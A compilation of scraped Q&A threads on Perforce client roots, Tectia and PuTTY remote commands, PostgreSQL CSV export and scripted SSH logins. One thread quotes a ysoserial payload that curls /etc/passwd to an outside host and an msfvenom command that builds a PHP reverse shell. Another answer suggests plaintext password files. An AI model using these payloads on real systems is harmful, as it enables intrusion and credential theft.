How to change the root of a clientspec using cmd - client

I have created a new clientspec using the command :
p4 client abc;
abc is the name of my cs
Now I want to change the root of this cs.
Can somebody please tell that how can I change the root of this clientspec without explicitly modifying the client file.(i.e. by using some command).
And is there any option of mentioning the root path while creating or setting the client (through command line)?

Here are some tips:
When creating a client a new client spec, you can seed the Root field by using the -d global option, e.g.:
p4 -d /this/is/the/client/root client NewClientName
You can also pipe the output of 'p4 client -o' to 'p4 client -i' to create or modify a client spec without having to open an editor, e.g.:
p4 -d /this/is/the/client/root client -o NewClientName | p4 client -i
The p4 -d trick won't do anything to replace the Root field in an existing client spec, however. For that, you need an inline filter, something like this:
p4 client -o ExistingClientName | sed -e '/Root:/ s,.*,Root: /new/root/path,' | p4 client -i

This is how your change root of an existing client spec using PowerShell script
$p4ClientSpec = p4 client -o "$env:COMPUTERNAME"
$p4ClientSpec = $p4ClientSpec -replace '^Root:.+$', "Root: D:\test"
$p4ClientSpec | p4 client -i

My setup:
macOS 10.14
p4 2019.1
None of the existing answers work for me.
I had to run in the Terminal
p4 client my-client
to edit the root path right in the opened text editor and save the spec.
After that, all is OK.

Related

SSH tectia, how to run batch commands?

I have tectia ssh server in a windows environment.
When I use sftpg3 -B cmd.txt username#host that works fine. The only problem is that it doesnt let me execute files remotely, it only lets me move files. It reads the commands from cmd.txt but since I cant execute anything it ignores the commands.
Well when I do the same thing but use sshg3, it doesnt recognize the -B flag at all.
SSHG3 -B cmd.txt username#host
cmd.txt' is not recognized as an internal or external command,
operable program or batch file.
I've tried putting -B "cmd.txt"
I tried just putting the cmd.txt contents in the same script instead of housing them in cmd.txt and getting rid of -B, but it doesnt run them that way either.
The docs dont have much to go off of. All it says is use -B for batch processing.
Contents of cmd.txt:
D:
cd Library
cd Backup
parseLibrary.cmd
exit
Trying to sshg3 into a host, navigate to a path and run a batch file on that host.
Any ideas?
-B, --batch-mode
Uses batch mode. Fails authentication if it requires user interaction on the terminal.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
It does use public key authentication, there is no user interaction needed on the terminal.
Noticed this on the docs for sftpg3
-B [ - | batch_file ]
The -B - option enables reading from the standard input. This option is useful when you want to launch processes with sftpg3 and redirect the stdin pipes.
By defining the name of a batch_file as an attribute, you can execute SFTP commands from the given file in batch mode. The file can contain any allowed SFTP commands. For a description of the commands, see the section called “Commands”.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
I'm guessing batch file is different than batch mode?
*I figured it out. You have to use the -B flag for every command you want to execute.
I figured it out. You have to use the -B flag for every command you want to execute.
sshg3 user#host -B dir -B ipconfig -B etc.cmd

Can't launch putty with remote command?

I'm attempting to launch putty via the command line in such a way that it runs a command on the server (I want to create a windows shortcut, to tail a log file)
So far I have a batch file containing this
"C:\Program Files (x86)\PuTTY\putty.exe" -ssh -t -pw -m tail_catalina_out -load "myprofile"
And within my server I have a file at the root directory named tail_catalina_out with the following contents.
tail -f /opt/tomcat/logs/catalina.out
Putty launches and my session starts successfully, but no command appears to be carried out despite this? Am I misunderstanding how this works?
You don't need -ssh with -load profile (and if you use a nonstandard port like my test it doesn't work at all); in fact you don't need it with [user#]host because it's the default
-pw -m tail_catalina_out uses -m as your password (which I hope is incorrect, so you should be reprompted unless publickey auth is set-up) and ignores tail_catalina_out
the file for -m must be local i.e. on the PuTTY machine not on the server (although the commands in it will be sent to, and must be valid on, the server)
Thus: "\path\to\putty" -t -m localcmdfile -load profile
You could also use plink which runs in the console and takes either -m localfile or the actual remote command on the command line after the last option (like the OpenSSH client ssh):
"\path\to\plink" -t -load profile tail -f remotefile
As usual, you can omit the quotes around the path if it contains no space. Personally I use \progra~2 instead of bothering with "\program files (x86)" but that's just me, and it may depend on a clean install (instead of upgrade).

How to 'path a file' when generate Metasploit shell?

I want to path a file with generate Metasploit shell. It is like this:
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=#etc/passwd axample.com" | base64
like -F file in example, I want to path a file in command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
This is just command I want to path a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.
As I understand, you are using msfvenom tool to generate a Meterpreter payload - the program that will run on the target host (in this case it will bring you command shell of the target host).
This payload is a part of Metasploit framework - a predefined program, not your custom script and you want to pass your file to it. If so, it all depends on the Meterpreter's parameters to pass anything to it. But it seems that there is no such option as just path a some file in Meterpreter.
In example with curl the -F option is recognized by cURL application and stands for HTTP Forms posting and directs web server for file uploading with given by property name file.
But what path to file you want to pass to the Meterpreter payload? What is your final goal? Now it looks like no sense for it.
UPDATE for you comment
The curl is a different application and they use -F option format implemented. In msfvenom use to pass variable CUSTOM1 the following form:
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...

PostgreSQL export result as CSV from remote server

I have read all other solutions and none adapts to my needs, I do not use Java, I do not have super user rights and I do not have API's installed in my server.
I have select rights on a remote PostgreSQL server and I want to run a query in it remotely and export its results into a .csv file in my local server.
Once I manage to establish the connection to the server I first have to define the DB, then the schema and then the table, fact that makes the following lines of code not work:
\copy schema.products TO '/home/localfolder/products.csv' CSV DELIMITER ','
copy (Select * From schema.products) To '/home/localfolder/products.csv' With CSV;
I have also tried the following bash command:
psql -d DB -c "select * from schema.products;" > /home/localfolder/products.csv
and logging it with the following result:
-bash: home/localfolder/products.csv: No such file or directory
I would really appreciate if someone can show a light on this.
Have you tried this? I do not have psql right now to test it.
echo “COPY (SELECT * from schema.products) TO STDOUT with CSV HEADER” | psql -o '/home/localfolder/products.csv'
Details:
-o filename Put all output into file filename. The path must be writable by the client.
echo builtin + piping (|) pass command to psql
Aftr a while a good colleague deviced this solution which worked perfectly for my needs, hope this can help someone.
'ssh -l user [remote host] -p [port] \'psql -c "copy (select * from schema.table_name') to STDOUT csv header" -d DB\' > /home/localfolder/products.csv'
Very similar to idobr's answer.
From http://www.postgresql.org/docs/current/static/sql-copy.html:
Files named in a COPY command are read or written directly by the server, not by the client application.
So, you'll always want to use psql's \copy meta command.
The following should do the trick:
\copy (SELECT * FROM schema.products) to 'products.csv' with csv
If the above doesn't work, we'll need an error/warning message to work with.
You mentioned that the server is remote, however you are connecting to a localhost. Add the -h [server here] or set the ENV variable
export PGHOST='[server here]'
The database name should be the last argument, and not with -d.
And finally that command should have not failed, my guess is that that directory does not exist. Either create it or try writing to tmp.
I would ask you to try the following command:
psql -h [server here] -c "copy (select * from schema.products) to STDOUT csv header" DB > /tmp/products.csv

Bash: How to use a secret file for a script?

I've created a really long script which fully automates installation and configuration of a web server in my company. During the script runtime it accesses some remote server using scp and ssh in order to download configuration files and I'd like to be able to have a secret file which holds the password (it's always the same password) and that the script will use this file without the need that i'll insert it manually. some lines from the script look like this:
/usr/bin/scp root#192.168.1.10:/etc/mail/sendmail.cf /etc/mail/
/usr/bin/scp -r root#192.168.1.10:/etc/yum.repos.d /etc/
/usr/bin/ssh root#192.168.1.10 'rpm -qa --queryformat "%{NAME}\n" >/tmp/sw.lst'
/usr/bin/scp root#192.168.1.10:/tmp/sw.lst /tmp/
/usr/bin/xargs yum -y install < /tmp/sw.lst
I know about the method of #ssh-keygen and #ssh-copy-id but the problem is that the script will run every time on a different machine and I don't want to exchange the keys before each run.
When i had to do something like that, i used expect and a wrapper script that would fetch a password from a file.
I.e. in my password file i'd have something like
root#192.168.1.10 ThisIsMyPass
user#localhost thisIsMyOtherPass
and then have the wrapper script get (it could be simple as grep "root#192.168.1.10" ~/.passwords | cut -d ' ' -f2)
Im guessing there are more appropriate methods, but with this one you only need to keep your wrapper and password file protected and you can make your setup script public.

Resources